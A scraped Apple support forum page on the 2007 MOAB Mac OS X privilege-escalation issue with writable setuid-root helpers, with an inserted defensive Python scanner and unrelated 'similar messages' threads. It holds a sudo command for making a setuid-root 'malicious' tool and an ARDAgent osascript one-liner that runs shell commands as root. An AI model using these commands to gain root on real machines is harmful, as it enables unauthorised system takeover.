Mac OS X Local Privilege Escalation Vulnerabilities

Yes this has happened to me
I found out about it on this site:
http://projects.info-pull.com/moab/MOAB-15-01-2007.html
It affects Disk Utility.
If you have the below when you check your disk permissions:
Determining correct file permissions.
Group differs on ./Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool, should be 80, group is 0
Group differs on ./Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy, should be 80, group is 0
Group differs on ./Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool, should be 80, group is 0
There is a workaround, but I am not sure I know how to do it. Can anyone write me a step-by-step guide, i.e. open Terminal, cd into so-and-so, that sort of thing? Also, is their workaround sound, or just some other vulnerability?
Please check out the link before answering.
Thanks in advance.
PS: Am I worried? No, not really; we can only learn from these things.

This "exploit" or whatever you want to call it is absolutely ridiculous, in my opinion.
"Multiple binaries inside the /Applications directory tree are setuid root, but remain writable by users in the admin group (ex. first user by default in a non-server Mac OS X installation), allowing privilege escalation. A malicious user can overwrite the binaries and perform a disk permissions repair operation via the diskutil tool, effectively setting back the default ownership and permissions (root setuid)."
The file at "/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool" is indeed a SetUID root helper tool which the Activity Monitor uses. Its owner is root, with a group of admin. Its parent folder is owned by root with a group of admin.
A "Standard" non-privileged user, or in other words, a user for whom the "Allow user to administer this computer" checkbox isn't checked in System Preferences, cannot do anything to alter the pmTool. When that checkbox is enabled, the user is part of the "admin" group. Since the pmTool is only writable by its owner "root", or by a user who's part of the "admin" group, a standard user can do nothing to alter it. Since the parent directory, /Applications/Utilities/Activity Monitor.app/Contents/Resources/, is only writable by its owner "root", or by a user who's part of the "admin" group, a standard user cannot remove, add, or replace the contents, including the "pmTool".
So what's left of this "exploit" is that a user that's an administrator could replace or modify the pmTool and use Disk Utility's Repair Permissions feature to "blindly" turn this malicious replacement executable into a SetUID root tool. They could then use this tool to wreak havoc on the system.
My only comments are:
1) Duh.
2) Why the heck would you want to go through this convoluted procedure just to create a (malicious?) SetUID root executable? If you're an admin, there are much simpler methods available.
If a user is an administrator, all they need to do to create a SetUID root tool is enter the following in the Terminal:
sudo chmod 4755 /Users/mdouma46/Desktop/myMaliciousSetUIDTool; sudo chown 0:0 /Users/mdouma46/Desktop/myMaliciousSetUIDTool
Just as effective, without all the convoluted "pseudo-exploit" stuff.
So, where exactly is the exploit now?
Dual 2.7GHz PowerPC G5 w/ 2.5 GB RAM; 17" MacBook Pro w/ 2 GB RAM -   Mac OS X (10.4.8)  
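The following audit script is an added example, not code from the thread or from the MOAB advisory: it reports setuid-root files under a directory tree that are writable by a group other than wheel, or that sit in a directory such a group can write to, which is the condition the reply above describes. Group ids 0 (wheel) and 80 (admin) are taken from the Disk Utility output quoted in the question; the function names and the trusted-group set are assumptions of the example.

```python
import os
import stat

# Constructed audit helper for the condition described in the thread:
# a setuid-root helper tool that is writable by the admin group (gid 80 on
# Mac OS X, per the Disk Utility output quoted above) or that sits in a
# directory that group can write to, so a group member could replace it
# and Repair Permissions would restore root ownership and the setuid bit.

ROOT_UID = 0
# Groups allowed to write to a setuid-root file without being flagged.
# Only wheel (gid 0) by default; admin (gid 80) is deliberately not trusted.
# (Assumption of this example, not a system setting.)
TRUSTED_GIDS = frozenset({0})


def writable_by_untrusted(mode, gid, trusted_gids=TRUSTED_GIDS):
    """True if the world-write bit is set, or the group-write bit is set
    for a group outside trusted_gids."""
    if mode & stat.S_IWOTH:
        return True
    return bool(mode & stat.S_IWGRP) and gid not in trusted_gids


def is_setuid_root(mode, uid):
    """True for a regular file owned by root with the setuid bit set."""
    return stat.S_ISREG(mode) and uid == ROOT_UID and bool(mode & stat.S_ISUID)


def is_writable_setuid_root(mode, uid, gid, trusted_gids=TRUSTED_GIDS):
    """The misconfiguration from the advisory: setuid root, yet writable by
    an untrusted group (or by everyone)."""
    return is_setuid_root(mode, uid) and writable_by_untrusted(mode, gid, trusted_gids)


def scan(root, trusted_gids=TRUSTED_GIDS):
    """Walk root and return (path, reason) pairs for setuid-root files that
    are either writable themselves or replaceable through a writable parent
    directory. Symlinks are not followed (lstat)."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        try:
            dir_st = os.lstat(dirpath)
        except OSError:
            continue
        dir_exposed = writable_by_untrusted(dir_st.st_mode, dir_st.st_gid, trusted_gids)
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not is_setuid_root(st.st_mode, st.st_uid):
                continue
            if writable_by_untrusted(st.st_mode, st.st_gid, trusted_gids):
                findings.append((path, "file is writable by gid %d" % st.st_gid))
            elif dir_exposed:
                findings.append((path, "parent directory writable by gid %d" % dir_st.st_gid))
    return findings


if __name__ == "__main__":
    import sys
    # Default to the /Applications tree named in the advisory.
    for found_path, reason in scan(sys.argv[1] if len(sys.argv) > 1 else "/Applications"):
        print("%s: %s" % (found_path, reason))
```

A clean tree produces no output; any line printed names a helper tool that Repair Permissions would re-bless as setuid root after an admin-group member altered or replaced it.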

Similar Messages

  • Local Privilege Escalation via ARD

    Slashdot has an interesting topic...
    osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
    Will print "root" and indeed evil things can be done by replacing
    "whoami" with a suitable command.
    The ARDAgent executable is suid'ed to root!
    Jerry

    Still no worky for me
    (spartan) ~ % bash
    bash-3.2$ while : ; do osascript -e 'tell application "ARDAgent" to do shell script "id"'; done
    31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
    31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
    ...

  • AUDIT action (create, delete, privilege escalation, set and change password from users account and group) users and admins in Solaris 10

    Hello.
    In Solaris 10 I need to audit the creation and deletion of user accounts and groups, privilege escalation, setting and changing passwords, etc.
    I set these settings:
    in file syslog.conf:
    *.info;mail.none;cron.none;audit.notice            @IP-Remote-syslog-server-SIEM
    in file   /etc/security/audit_control:
    dir:/var/audit
    flags:lo,ad,ex,cc,am,no,fc,fd
    minfree:20
    naflags:lo
    plugin:name=audit_syslog.so;p_flags=lo,ad,ex,cc,am,no
    in file   /etc/security/audit_user:
    root:lo,ad:no
    Now I see in the logs only the fact of a connection via SSH and processes run on behalf of users. Creating and deleting users and changing passwords for some reason are not logged.
    There are many users. Writing an entry for each individual in the file /etc/security/audit_user is not possible; a new user is likely to be forgotten (or is there a possibility to describe the audit for all accounts with one line in this file?)
    Where is the mistake?

    You are most likely hitting Bug 15779000 user/role/groupadd/mod/del don't audit their use.
    And the fix is only available in S11.2.
    -- Renaud

  • Getting the MAC address of local computer

    Hello developers! Can you tell me how I can get the MAC address of the local computer in Java, JDK 1.4.0?
    Thank you!

    Hi,
    There isn't a particular method you can call. However check out this thread.
    http://forum.java.sun.com/thread.jsp?forum=4&thread=239391
    This has sample code to get the MAC address on Windows.
    Regards,
    Roopasri Vittal
    Developer Technical Support
    Sun Microsystems
    http://sun.com/developers/support

  • Adobe Reader XI privilege escalation

    ...I know, this is not really a privilege escalation in the classical way...
    Hi.
    With both the current versions of Adobe Reader X and XI, standard users are able to repair Adobe Reader via appwiz.cpl/Control Panel.
    Problem is: if reader is opened, Windows needs to restart to finish repairing...problem is, even if standard users are NOT allowed to restart the computer (think of terminal servers with dozens of clients logged on), they MAY restart the server, causing real trouble. So even with GPOs in place that deny standard users the privilege to shutdown/restart the computer, buggy Adobe Reader makes it possible.
    Side note: while UAC will prompt users to supply admin credentials when trying to uninstall Adobe Reader, it does not prompt when trying to repair. That's the bug.
    Tested on win8/server 2012, Server 2008 R2. Adobe Reader 11.0.3/10.1.7

    http://www.adobe.com/devnet/reader.html
    You may want to check with the dev people about the shut down and how to disable it, this being a user-to-user forum, and not often frequented by development personnel. I'm sure there's a simple code change that will disable it, however, without the restart, the repair becomes useless as Reader cannot repoen until the proper reg keys and dll files are amended per the repair, but then you already know that.
    There may also be a code change to enable UAC for repairs. My understanding is that an uninstall may remove shared files, and that's the parameter for Windows to prompt with UAC. but the repair only changes installed files using existing files, so Windows doesn't see that as a potential for damage.

  • After Effect cs4 cannot render jpg on network on mac but render locally okay

    We use intel mac pro as workstation, and our servers are windows 2003 servers.
    After Effects CS4 renders H264 on the network without any problem, but JPEG does not.
    Thank You
    Ayhan.

    Perhaps you must just enable the Allow Encoding using Legacy CoDecs option in the QuickTime control panel on the network machine or else some of that may not show up. Of course make sure QT is installed correctly in the first place, as Todd and Rick said. On a server, you may need to set special group policies for that to work, also.
    Mylenium

  • UNpatched Windows Privilege Escalation Vulnerability + Flash exploits

    The following has been copied/pasted from http://secunia.com/advisories/64146/ (which, while free, requires registration to view):
    A [0-day] vulnerability has been reported in Microsoft Windows, which can be exploited by malicious, local users to gain escalated privileges.
    The vulnerability is caused due to an unspecified error. No further information is currently available.
    Note: Reportedly, the vulnerability is currently being exploited in limited, targeted attacks.
    =====================================================================
    The following has been copied/pasted from https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
    FireEye Labs recently detected a limited APT campaign exploiting [a combination of] zero-day vulnerabilities in Adobe Flash and a brand-new one in Microsoft Windows...
    While there is not yet a patch available for the Windows vulnerability, updating Adobe Flash to the latest version [17.0.0.169] will render this in-the-wild exploit innocuous.
    It is therefore prudent for anyone who has not updated an older Flash (<=17.0.0.134) do so expeditiously.
    ===================================
    EDIT:  (With acknowledgement to "Puppy" at the Lenovo Forum)
    It seems that even the newest version of Flash (x.169) is no longer secure:
    On April 14th 2015, Adobe patched CVE-2015-0359 in APSB15-06. On April 17th, just 3 days later, a new version of the Angler Exploit Kit (EK) was released that targets the patched vulnerability.
    https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html

    Hi colbabomb, I rarely visit sites that use QuickTime (e.g., Apple). The problem pages used Flash (such as the page with the video of last Monday's SuMo meeting).

  • How do I setup CalDav and CardDav servers on my Mac to enable local 'cloud' syncing in Mavericks

    I've decided to start off a new thread having initially posted on How to locally sync an iPhone with OS X Mavericks? iCloud is NOT an option.
    It is clear to me that it is possible to establish syncing locally without going outside one's own home, and without internet access. I am bugged by the fact that the previous service has gone without any user focussed warning, but I am keen to find a way of solving the problem. If you are just frustrated, I'd be grateful if you can keep your annoyance off this thread.
    My guess is that a CalDav and CardDav server hosted on my own Mac can be set up to sync with my iPhone (3GS) either on a Computer-to-Computer (ad hoc) network or via my own home LAN. The trouble is I am not network/Apache savvy enough to use it.
    I am reluctant to fork out an additional amount for the Mavericks server as I don't have any other foreseeable need for it, but Mavericks comes with Apache pre-loaded and there is a very light, simple and free open source CalDav and CardDav server in Baïkal. The trouble is I am not apache/network savvy enough to make use of it, and basically I am stumbling along in the near dark with terminal.
    There are some good resources for setting up Apache and for setting up Virtual Hosts which would host my personal 'cloud', and Baïkal also comes with setup guides as well. The trouble is, I don't quite have enough knowledge to marry the two together. Is there anyone contributing to or watching this thread who has the know-how to do a proper step by step guide for running Baïkal on Apache as installed in the Mavericks OS, and setting up a local 'cloud'.
    AFAICT the problem with the resources I have found is that the Apache stuff I've found doesn't particularly focus on running Baïkal, and the Baïkal documentation is not specific to Apache on Mavericks. Is there anyone out there who can give me some help with this?
    Can anyone help - please?

    I've now downloaded ownCloud 4.5.13 and followed the installation instructions in the Administrators Manual. I am slightly concerned to read under MacOS: "This section of the manual needs to be revised."
    However, I have followed the instructions there, and step 5 has taken me to the web setup page where I have created an account with user name and password.
    Then I went to Calendar, and from the Calendar menu chose Add Account… In the dialog that followed I chose Add CalDAV Account. I chose Account Type Manual and put in the username and password I used when setting up the ownCloud account. For the URL I followed the manual and put: http://ADDRESS/remote.php/caldav/principals/username/ substituting 'localhost:8888/ownCloud' for the address, and my ownCloud username for the username. (If I just used 'localhost:8888' for the address it produced the message: "The URL http://localhost:8888/remote.php/caldav/principals/[myusername]/ encountered HTTP error 404. Make sure the URL is correct.".)
    So far I am semi-successful. It has created a Http://Localhost:8888/Owncloud account on Calendar in which I have been able to create a test calendar and an event. I have also deleted the event, but Calendar will not let me delete the calendar. Once I inserted a second calendar the Delete command became available, but failed with this notice: "http://localhost:8888/ownCloud/remote.php/caldav/principals/[myusername]/ is not a location that supports this request." A retry deleted the name of the calendar, but left it otherwise intact. The account now has a grey triangle next to it which when clicked produces the following: "The request (CalDAVCalendarSplitDualTypeCalendarQueueableOperation) for account “Http://Localhost:8888/Owncloud/Remote” failed."
    I think this may be resolved by an ownCloud setting. I will see if I can track this down. Has anyone here got any thoughts?
    [I'm sorry I seem to be unable to prevent the editor from creating clickable links from the URLs I am posting]

  • On Mac OSX open local files in a new Tab instead of a new Window

    On my MacBook Pro OSX 10.6 both FF3 and FF6 do not open a new tab for links on local files (file:///) but a new window instead.
    FF3 and FF6 do open new tabs for external URLs (http://).
    My FF preferences are set to "new tab always".
    I tried some "browser.links." properties in "about:config".
    I also tried the "Tab Mix Plus" extension.
    With no change.
    Note:
    * FF3.6 was doing the same thing on my (past) Mac G4
    * Safari, Chrome, Opera do the right thing (open new tab) on the same Mac and files.
    * FF3.6 and FF6 do the right thing (open new tab) on my PC with Windows XP

    You can look at the browser.link.open_newwindow prefs on the about:config page.
    * http://kb.mozillazine.org/browser.link.open_newwindow.restriction (0)
    * http://kb.mozillazine.org/browser.link.open_newwindow (3)
    To open the about:config page, type about:config in the location (address) bar and press the "Enter" key, just like you type the URL of a website to open a website.
    If you see a warning then you can confirm that you want to access that page.
    * Use the Filter bar at the top of the about:config page to locate a preference more easily.
    * Preferences that have been modified show as bold (user set).
    * Preferences can be reset to the default or changed via the right-click context menu.

  • Mac to PC local connection

    I want to connect my mac(10.9.4) and pc(win 8.1) using a personal hotspot type of a network ...
    I don't want to share the internet, i just want to create a local network to share data and media...
    I tried to use "create network" on the mac, but the network that is created is not detected by the windows pc ...
    Is there a way to detect the network, or any other application on Mac that could perform this task? Please help!

    Hi bhargav17,
    It sounds like you are having issues with your PC being unable to join a network created by your Mac. The following article gives instructions on how to set up the wireless network from your Mac -
    OS X Mavericks: Create a computer-to-computer network
    http://support.apple.com/kb/PH13796
    If that does not work, you may want to connect the computers using an Ethernet cable instead of wirelessly.
    Once either of these is working you can set up file sharing to work using the following article -
    OS X: How to connect with File Sharing using SMB
    http://support.apple.com/kb/HT5884
    Or you can have the Mac connect to shared volumes on the PC -
    OS X Mavericks: Connect to shared computers and file servers on a network
    http://support.apple.com/kb/PH13779
    Thanks for using Apple Support Communities.
    Best,
    Brett L

  • Should I ok "this computer's local hostname Irma-Mac-mini-local" is already in use on this network. The name has been changed to Irma2 Mac-mini 2-local

    Should I ok this message-this computer's local hostname Irma's Mac-mini-local is already in use on this network. The name has been changed to Irma's Mac-mini-2local

    Don't think this is a conflict with IP Addresses or computer names
    = DHCP hangover when computer renews DHCP lease
    There is no actual other computer
    It just appears that way when reconnects so creates new -2 computer name
    What types of names do you use your computers ?
    Whether you name them after quantum particles or the romantic poets...
    They will each start to be appended with "-2" then "-3" etc if you auto configure network settings from Airport Router  DHCP service and you have this Change computer name issue where pop up window states name is already being used on your LAN
    As stated previous post you can reset the computer name in SysPrefs / Sharing / Edit button
    And restart Router or renew all DHCP leases (if persists in not allowing original name)
    Can now press Edit and reset name of choice
    But for Fix see link above

  • Time machine backups: Size of Mac HD Backup vs Mac HD on local machine

    Hello,
    Today I used Time Machine to backup the computer.  It completed the backup and now I want to *make sure* that the backup files and the local machine files are the same size; don't want to leave anything up to some program when so much is at stake.  
    The problem: On the External HD, the size of the account I *MUST* have backed up is 20Gb.  When I look at the /Volumes/Mac HD/Users/##### I see the user account as being 45GB.
    I'm pretty sure that Time Machine doesn't compress any of the files.  I am also aware of the changing nature of ~/Library and other similar files.
    What is going on here?   Can I be sure that my backups are truly complete backups?
    Other than looking at the folder size, how can I really know what the actual size is?
    Any info would be great.
    Thanks,
    Allan

    There is a wealth of Time Machine information here:
    http://pondini.org/OSX/Home.html
    AC

  • Message application between Macs on internal local network

    I’m looking for an application that will allow interchange of short messages (copy/pasteable) between Macs on my home network via Ethernet/router/Airport. At the moment, I use email.

    You can use iChat via Bonjour on your local network to communicate in much the same fashion as you'd use it via internet based services. I even found a nice short video demonstrating the ease of setup:
    http://video.google.com/videoplay?docid=-988717806037213326#

  • Mac accounts for local sharing are hidden?

    Hi,
    I created a mac os account only for sharing music in the local network (in german it's a »Nur Freigabe«-account). Everything worked nice, the account »macmusik« got access to my music folders, I activated »smb« for windows and it worked.
    For reasons I don't know, this account »macmusik« isn't in the user control panel anymore (screenshot no. 1). But the account still exists (screenshot no. 2).
    Where can I find it?
    Julian

    Hello Kevin,
    the report RPRFIN00_40, which transfers the settlement results to FI (not posting), has a user exit (include RPREX010) with two form routines:
    EXB706K  User form before reading table T706K
    and
    EXA706K  User form after reading.
    Both routines have the parameter PTRV_HEAD.
    In PTRV_HEAD you will find the chosen trip scheme and ZLAND (ZLAND = main travel destination country).
    So you could program the routine after reading the T706K table, EXA706K, in the following way.
    Rough example for a country version, e.g. Germany:
    " parameter name p_wa_head is assumed here; the post spells it inconsistently
    IF p_wa_head-molga = '01'.        " Germany
      IF p_wa_head-schem = '02'.      " international trip scheme
        IF p_kont1 = '+20'.           " only the 'meal per diem account' should be changed
          p_kont1 = '+99'.            " instead of +20; fantasy account 99 must be maintained in ta PRT3 HRT too
        ENDIF.
      ENDIF.
    ENDIF.
    ...Something like this.
    Alternatively you can use ptrv_head-ZLAND like the non-active example in the user exit: IF p_wa_head-zland NE t001-land1.
    I haven't tried this out, but maybe it's helpful.
    Best regards
    Klaus

  • Browsing for other Macs on same Local Area Network

    I have two Macs both with AppleTalk turned on and both connected to a local area network. The router hands out IP addresses, i.e. they are not fixed. I would like to either browse for one computer from the other or enter the NAME of the other computer and have it located. I carefully check the other computer to determine its name and enter it in the "Connect to Server" and it isn't found. I try browsing and it doesn't show anything except Applications/Library/User folders in "Network". None of these are on the other computer.
    I have to log onto the other computer, look up its current IP address, then enter it on the one I want to connect from.
    It should be possible to locate other computers that have sharing turned on.
    What do I do to make this happen either automatically or when I browse. Even Windooze can locate other windooze machines on the same network!

    I imagine you've already done this, but when you copy the computer's name, you changed the spaces to dashes, right?
    If this is the Computer Name as listed in "Sharing":
    My Isolated Mac
    When you connect to server (apple-K), you type this for the "server address":
    My-Isolated-Mac
    I've had this problem with the Network Browser too. Today in fact. Sometimes the "Network" item in the left column of a Finder window will have a tiny "eject" icon beside it, and when you select Network, you get a list of everybody available. Sometimes you don't see the icon, and when you select Network, I just see three empty folders. I haven't figured out why, but when I did "Connect to Server" and typed the Bonjour name of one of the computers on the network, I connected and everything seemed to work again. Hmmm...
    Good luck.
